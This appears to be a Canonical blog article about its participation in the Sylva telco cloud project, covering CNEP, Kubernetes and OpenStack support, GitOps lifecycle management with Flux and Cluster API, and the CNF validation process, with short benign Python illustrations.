CNEP’s set of supported features makes it ideal for operators who want to adopt a Sylva compliant platform with validated telco CNFs from vendors, e.g. 5G core and Open RAN as well as MEC CNFs, such as content delivery networking (CDN) software. The platform software stack fully supports the Sylva design from bare metal to containers, with capabilities including:
In addition to Canonical Kubernetes and our CNEP solution, Canonical OpenStack supports the advanced platform features that Sylva validation platforms need, including SR-IOV, DPDK, CPU-pinning, NUMA, Hugepages, PCI passthrough, and NVIDIA GPUs with virtualisation. It has native support for both Ceph and Cinder as storage components, both of which are included in the Sylva platform design and roadmap.
Aligned with telco operator needs, Sylva envisions cloud-native telco software execution on Kubernetes platforms. Operators look to deploy Kubernetes clusters at their telco edge, regional and core clouds, providing them with a uniform cloud-native execution environment.
Modern telco infrastructure is distributed, deployed across multiple locations with tens of thousands of far-edge clouds, thousands of near-edge clouds and tens of regional clouds. This calls for deploying and managing a large number of Kubernetes workload clusters at geographically dispersed locations, controlled by management cluster(s) located at regional and central clouds. To tackle this challenge, Sylva has defined a software framework for telecom software platforms based on Kubernetes that are deployed on a large scale.
Modern telco clouds must also support a set of enhanced platform features often required by telco CNFs. To this end, the project’s validation platforms verify that (i) the deployment platform supports the requirements of the CNF under test, and (ii) the CNF can correctly deploy on the platform and successfully consume these platform features.
Sylva follows a declarative approach with a GitOps framework to manage a high volume of physical nodes and Kubernetes clusters. Infrastructure lifecycle management covers Day 0 (build and deploy), Day 1 (run) and Day 2 (operate) operations, including fault management, updates and upgrades. The project provides automation with CI/CD pipelines, where a set of scripts produces and maintains Helm charts containing Kubernetes deployment and operational resource definitions.
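The essence of this declarative, GitOps-style approach can be sketched in a few lines: the desired state lives in Git, and a controller repeatedly computes the actions needed to converge the live state toward it. This is a minimal illustration of the reconciliation idea, not Sylva’s actual tooling; the cluster names are made up.

```python
# Minimal sketch of GitOps reconciliation: diff the desired state
# (checked into Git) against the live state and emit converging actions.

def reconcile(desired: dict, live: dict) -> list:
    """Return the actions needed to make `live` match `desired`."""
    actions = []
    for name, spec in desired.items():
        if name not in live:
            actions.append(f"create {name}")
        elif live[name] != spec:
            actions.append(f"update {name}")
    for name in live:
        if name not in desired:
            actions.append(f"delete {name}")   # prune resources removed from Git
    return actions

desired = {"mgmt-cluster": {"replicas": 3}, "edge-cluster-01": {"replicas": 1}}
live = {"mgmt-cluster": {"replicas": 1}, "old-cluster": {"replicas": 1}}
print(reconcile(desired, live))
# -> ['update mgmt-cluster', 'create edge-cluster-01', 'delete old-cluster']
```

Real GitOps controllers such as Flux run this loop continuously, so any drift between Git and the infrastructure is detected and corrected automatically.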
A dedicated work group, called Telco Cloud Stack, has developed tooling for cluster deployment and lifecycle management (LCM). This tooling is based on the Flux GitOps tool, which keeps clusters and infrastructure components in sync with their definitions in Git repositories.
To manage Kubernetes clusters and bare metal provisioning with this toolchain, Sylva leverages Cluster API (CAPI).
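To give a feel for what the management cluster reconciles, the sketch below emits a minimal Cluster API `Cluster` object as JSON. The `apiVersion`s and kinds are standard CAPI conventions, with the Metal3 infrastructure provider shown because Sylva targets bare metal; the cluster name is illustrative and the manifest is simplified (a real one carries networking and provider-specific spec fields).

```python
import json

# Sketch: the minimal CAPI "Cluster" object that a management cluster
# reconciles for each workload cluster. Metal3Cluster is the bare metal
# infrastructure provider; "edge-cluster-01" is an illustrative name.

def capi_cluster(name: str) -> dict:
    return {
        "apiVersion": "cluster.x-k8s.io/v1beta1",
        "kind": "Cluster",
        "metadata": {"name": name},
        "spec": {
            "controlPlaneRef": {
                "apiVersion": "controlplane.cluster.x-k8s.io/v1beta1",
                "kind": "KubeadmControlPlane",
                "name": f"{name}-control-plane",
            },
            "infrastructureRef": {
                "apiVersion": "infrastructure.cluster.x-k8s.io/v1beta1",
                "kind": "Metal3Cluster",   # bare metal provisioning backend
                "name": name,
            },
        },
    }

print(json.dumps(capi_cluster("edge-cluster-01"), indent=2))
```

In a GitOps setup, manifests like this are committed to Git, and Flux applies them to the management cluster, which then drives hardware provisioning and cluster creation through CAPI.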
CNFs from different vendors are validated on Sylva platforms to ensure interoperability between the CNFs and the platforms. The project’s validation program ensures that telco operators who deploy platforms with software components that follow the Sylva reference implementations gain two benefits: (i) verified telco CNF functionality on their cloud platforms, and (ii) verified support for the telco-grade platform features which these CNFs require.
The project has a dedicated work group called the Sylva Validation Center, which tests deployment of vendor CNFs on the project’s validation platforms, where Kubernetes runs on either bare metal hardware or on OpenStack.
Validating a CNF on a Sylva platform starts with identifying the set of platform capabilities the CNF requires, including CNIs, and then installing and configuring the platform with those capabilities. Once the platform has been configured, a first set of smoke tests is run to verify the platform’s support for these features. After the CNF has been deployed on the platform, functional tests verify that the deployment completed correctly and that all the necessary Kubernetes pods are healthy and in the Ready state. Finally, operators may run additional tests on CNFs if deemed necessary.
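The two checkpoints of this flow, capability smoke tests and post-deployment health checks, can be sketched as two small functions. This is a simplified illustration of the described workflow, not the Validation Center’s actual test harness; the capability and pod names are invented.

```python
# Sketch of the two validation checkpoints described above:
# (1) does the platform expose every capability the CNF declares?
# (2) after deployment, are all of the CNF's pods healthy?

def smoke_test(platform_caps: set, required_caps: set) -> set:
    """Return the required capabilities the platform is missing (empty = pass)."""
    return required_caps - platform_caps

def deployment_healthy(pod_phases: dict) -> bool:
    """All pods of the deployed CNF must be in the Running phase."""
    return all(phase == "Running" for phase in pod_phases.values())

# Illustrative capability sets and pod states:
platform = {"multus", "sriov", "hugepages"}
cnf_needs = {"multus", "sriov"}
assert smoke_test(platform, cnf_needs) == set()   # smoke tests pass

pods = {"upf-0": "Running", "upf-1": "Running"}
print(deployment_healthy(pods))  # -> True
```

A real harness would query the cluster (for example via the Kubernetes API) rather than take dicts, but the pass/fail logic follows the same shape.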
Canonical’s open source software and solutions meet the platform feature requirements of telco CNFs as tested by the Sylva Validation Center, such as SR-IOV, Multus CNI and Real-time Linux. Validating telco CNFs on Canonical’s platforms for Sylva also ensures that our platforms, with their support for these advanced features, are verified by Sylva to run these CNFs.
In its roadmap for 2024, the Sylva project plans to add support for new features in its validation platforms, such as near real-time Linux, an immutable operating system for far-edge clouds and GPU offloads. Canonical’s software platforms follow Sylva’s vision and already support these features today, with Real-time Ubuntu, the immutable Ubuntu Core OS, support for Precision Time Protocol (PTP) and more.
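As a small example of the kind of capability probe a validation platform might run for such features, the sketch below detects a real-time (PREEMPT_RT) kernel from its version string. The string-matching heuristic is an assumption for illustration, not a Sylva-defined check, and the sample version strings are made up.

```python
# Sketch: probing for a real-time kernel, as a validation platform might
# do before scheduling latency-sensitive CNF tests. The PREEMPT_RT marker
# heuristic and the sample strings below are illustrative assumptions.

def is_realtime_kernel(uname_version: str) -> bool:
    """True if the kernel version string advertises the PREEMPT_RT patch set."""
    return "PREEMPT_RT" in uname_version

rt_kernel = "#1 SMP PREEMPT_RT Tue Jan 9 12:00:00 UTC 2024"       # hypothetical
generic_kernel = "#58-Ubuntu SMP PREEMPT_DYNAMIC"                 # hypothetical
print(is_realtime_kernel(rt_kernel), is_realtime_kernel(generic_kernel))
# -> True False
```

On a live system the version string would come from `platform.version()` or `uname -v` rather than a literal.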
Canonical is committed to making Sylva a benchmark platform for executing telco network functions. This commitment entails contributing to the infrastructure-as-code scripts that compose Sylva, enabling our open source solutions for Sylva, and aligning with the evolving technical scope of the project.
Linux Foundation Europe’s Sylva project has defined a platform architecture for validating cloud-native telco network functions on Kubernetes. This provides telco operators with guidance on how to achieve a uniform cloud infrastructure, covering edge, regional and central cloud locations, ultimately aiming at multiple objectives, including cost reduction, interoperability, automation, compliance and security.
The project emphasises the central role of open source platforms with standard, open APIs, which enables a modular approach to designing and deploying telco cloud systems.
Canonical offers fully upstream and telco-grade open source solutions that align with the Sylva platform architecture, including Canonical Kubernetes and Canonical OpenStack. We have also engineered an innovative platform solution, CNEP, which is fully in line with Sylva’s vision of multi-tenancy, multi-site Kubernetes clusters and bare metal, with full automation of hardware provisioning and cluster lifecycle management performed via the industry-standard Cluster API.
Canonical provides a full stack for your telecom infrastructure. To learn more about our telco solutions, visit our webpage at ubuntu.com/telco.
Canonical joins the Sylva project